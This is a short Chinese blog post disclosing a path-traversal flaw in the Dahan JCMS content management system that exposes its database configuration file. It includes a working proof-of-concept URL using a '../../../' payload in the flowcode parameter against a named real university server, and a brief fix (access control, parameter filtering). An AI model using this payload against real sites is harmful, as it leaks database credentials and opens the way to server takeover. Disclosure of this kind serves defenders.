大汉JCMS内容管理系统由于对文件读取时没有对文件路径进行过滤,导致可以直接直接读取 数据库配置文件,可导致数据库泄露或者getshell   由于读取xml文件时没有对传进的参数进行过滤,flowcode参数可控,配置文件地址WEB-INF/config/dbconfig.xml,由于控制了文件后缀,只能读取xml文件     http://netcenter.cau.edu.cn/jcms/workflow/design/readxml. jsp?flowcode=../../../WEB-INF/config/dbconfig   大汉版通JCMS数据库配置文件读取漏洞 – 网站安全插图       修复方案: 权限控制,参数过滤
    上一篇: 新浪邮箱存储型XSS 第二弹 - 网站安全 - 自学php

    下一篇: ShopEx短信通系统sql注入(POST) - 网站安全 - 自学
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《大汉版通JCMS数据库配置文件读取漏洞 – 网站安全
   

还没有人抢沙发呢~